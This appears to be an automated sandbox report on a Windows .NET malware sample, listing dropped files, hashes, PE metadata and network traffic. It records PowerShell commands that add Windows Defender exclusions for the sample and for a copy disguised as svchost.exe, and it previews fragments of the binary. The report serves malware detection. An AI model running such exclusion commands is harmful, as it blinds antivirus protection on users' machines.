                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.216554.+ytC9MFS.20210408110204.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):862
                                                    Entropy (8bit):5.356189201456313
                                                    Encrypted:false
                                                    SSDEEP:24:BxSA33yxvBndx2DOXUWeSuMG1OWbHjeTKKjX4CIym1ZJXDFuMG1C:BZuvhdoO+SqPbqDYB1Z3qg
                                                    MD5:BCF1AA333B0E2685377E4D638341B518
                                                    SHA1:D2D2DF3F261EBEDE89E39314B34FB153915B9A1F
                                                    SHA-256:E69620958827E1C5ADABAB8EEBBE18350B0316BEFE2CE4852F496756E0B7F086
                                                    SHA-512:E06DFFB20671B0DDB6AAAD522CF1BA442D7EA59334A235EDCE4C42E47E8F59FC7F9754FF0BA5DA2D9C6EEC58FCA81D60B13174E13B9DF6C8186D977786DB0A38
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408110234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..Process ID: 1000..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408110235..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..
                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.216554.6CUcdU4H.20210408110202.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):843
                                                    Entropy (8bit):5.329898122050224
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAGxvBndx2DOXUWeSuWW9HjeTKKjX4CIym1ZJXVu6:BZyvhdoO+SI9qDYB1ZrR
                                                    MD5:67C14436066F55A5F8035E0A8785E196
                                                    SHA1:29F44AD56CD4E5515590510E3F20F3B71A73A2A2
                                                    SHA-256:F5782A22B43FA86B0F2FE3AE18747CD303B4FCE8EC9B9405993BF4F7270EA14A
                                                    SHA-512:567D1876B4FD16D28DDC5A820C28E08C56D6469DA5CB684F3D0BEFAE757D67940CF8791157DCA03B60F203C733E0D9DF21FDB4340386E13EFD149B422DEFC2D5
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408110230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lfQuSBwdSf.exe -Force..Process ID: 720..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408110231..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lfQuSBwdSf.exe -Force..
                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.216554.Pgu86VMD.20210408110201.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):862
                                                    Entropy (8bit):5.359412750263977
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAYxvBndx2DOXUWeSuMG1OWXHjeTKKjX4CIym1ZJXZuMG1C:BZsvhdoO+SqPXqDYB1Zzqg
                                                    MD5:668F65C7B522C96ACB85A8AAF637EF96
                                                    SHA1:56D58F4E00C02FBC9E5356CB0F41AAC8F39AE683
                                                    SHA-256:75FCC43B2DB59D46B2645D868015C09830BC71A423251C9DA05C6D45584528AB
                                                    SHA-512:1369B9032D0A3840191BDB50068959A32E7142D3DE22AE44BAE0B5B287255E52BBF8EA2C147A753A4D4ED561C6C4C81C60EB19DCE1B164810D10DFF48AEAA05B
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408110225..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..Process ID: 1004..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408110226..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..
                                                    C:\Users\user\WrdAHTtKmtDmuc
                                                    Process:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):5832256
                                                    Entropy (8bit):3.076288730928143
                                                    Encrypted:false
                                                    SSDEEP:12288:g/K5NquGjzowGM2Qn7QJi/7goLuPp393mcN6z03z9aLIG6ades08zoX4sm21Tgtk:Te8zlte8zld6StGZPve8zld6StGZPT
                                                    MD5:41E25385DEA56C5FFE7F052EA7EC9865
                                                    SHA1:B2B5504C508D07EC073718C953237A265F37B3A9
                                                    SHA-256:C941110415F3819464D4A8D0A8EA8B7CA31FB22C576EBD850DD2F24AA55D118F
                                                    SHA-512:76A0D7A15DF9595B82723D1A0696F57423683506FD40F73FB66974BE770BCD379908FB26D735E38547C5429B985A18130F52C997738D83EF274350BCBE95659B
                                                    Malicious:false
                                                    Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 114 13 0 0 6 0 0 0 0 0 0 110 144 13 0 0 32 0 0 0 160 13 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 13 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 32 144 13 0 75 0 0 0 0 160 13 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 13 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 116 112 13 0 0 32 0 0 0 114 13 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0
                                                    C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                    Process:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):46080
                                                    Entropy (8bit):5.842547697365067
                                                    Encrypted:false
                                                    SSDEEP:384:GrrHzbTWuxdvMvNZeA7JLtNnE27w/yvej5VLUJflhAtRtkDo3mC05aESzAdG4caM:GrrHzbJx4so8yiGfluTcU
                                                    MD5:0802967C1D72DEEB4E1B79AF74FDB553
                                                    SHA1:F8EDBBED8318311F070167C73FCCA9F63F79C905
                                                    SHA-256:201872C79F07606D9874BC471ACF1999E0EEF0703E73C71A4A297EB56C70BCFB
                                                    SHA-512:7566FF29FD3D743AD92543540A42AEC7731B996D171A0197971812396B8221387495F8AC1606D647ABDB888B630D1273C4207A800FA886CCB1E59029D1B86153
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..h...J........... ........@.. ....................... ............@....................................O.......dF...........r............................................................... ............... ..H............text...$f... ...h.................. ..`.rsrc...dF.......H...j..............@..@.reloc..............................@..B........................H........5...P...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....r...p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....r...p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........r#..p.+..........s......%r9..p .........%.r...p.%.r...p.%.r...p
                                                    C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.842547697365067
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:lfQuSBwdSf.exe
                                                    File size:46080
                                                    MD5:0802967c1d72deeb4e1b79af74fdb553
                                                    SHA1:f8edbbed8318311f070167c73fcca9f63f79c905
                                                    SHA256:201872c79f07606d9874bc471acf1999e0eef0703e73c71a4a297eb56c70bcfb
                                                    SHA512:7566ff29fd3d743ad92543540a42aec7731b996d171a0197971812396b8221387495f8ac1606d647abdb888b630d1273c4207a800fa886ccb1e59029d1b86153
                                                    SSDEEP:384:GrrHzbTWuxdvMvNZeA7JLtNnE27w/yvej5VLUJflhAtRtkDo3mC05aESzAdG4caM:GrrHzbJx4so8yiGfluTcU
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..h...J........... ........@.. ....................... ............@................................

                                                    File Icon

                                                    Icon Hash:30828a8c8c828010

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x40861e
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85cc0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x4664.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x72000x14e0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x66240x6800False0.332594651442data6.27050186695IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xa0000x46640x4800False0.14892578125data4.10630489014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0xa1300x4028dBase III DBT, version number 0, next free block index 40
                                                        RT_GROUP_ICON0xe1580x14data
                                                        RT_VERSION0xe16c0x30cdata
                                                        RT_MANIFEST0xe4780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright 2021
                                                        Assembly Version1.0.0.0
                                                        InternalNameDimbono.exe
                                                        FileVersion1.0.0.0
                                                        CompanyName
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameDimbono
                                                        ProductVersion1.0.0.0
                                                        FileDescriptionDimbono
                                                        OriginalFilenameDimbono.exe

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 8, 2021 11:01:44.745105028 CEST4970080192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.763072014 CEST8049700104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.763185978 CEST4970080192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.763689041 CEST4970080192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.781486988 CEST8049700104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.789665937 CEST8049700104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.848814011 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.866358995 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.866476059 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.889404058 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.906951904 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.910037994 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.910068989 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.910156965 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.916479111 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.934339046 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.934370995 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:44.954818010 CEST4970080192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:44.987306118 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.005022049 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206446886 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206482887 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206516981 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206542969 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206549883 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.206568956 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206583977 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.206603050 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206630945 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206648111 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.206655979 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206696033 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.206815004 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206837893 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.206882000 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.206965923 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.267350912 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.393932104 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.393970966 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.393992901 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394015074 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394033909 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394063950 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.394104958 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394110918 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.394150019 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.394181013 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394301891 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394324064 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394342899 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.394848108 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394895077 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.394906044 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.395047903 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.395072937 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.395092010 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.395802975 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.395831108 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.395853043 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.395860910 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.395896912 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.395900965 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.396452904 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.396483898 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.396512032 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.396574974 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.396599054 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.396609068 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.397416115 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397454023 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397475004 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397476912 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.397500038 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397509098 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.398221016 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398251057 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398266077 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.398274899 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398303032 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398320913 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399104118 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399136066 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399157047 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399213076 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399233103 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399250031 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399724007 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399749994 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399769068 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399821997 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399857998 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399858952 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400578022 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400609970 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400633097 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.400635004 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400672913 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.412417889 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.412455082 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.412477016 CEST44349701104.21.56.119192.168.2.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 8, 2021 11:01:38.755899906 CEST5020053192.168.2.38.8.8.8
                                                        Apr 8, 2021 11:01:38.775214911 CEST53502008.8.8.8192.168.2.3
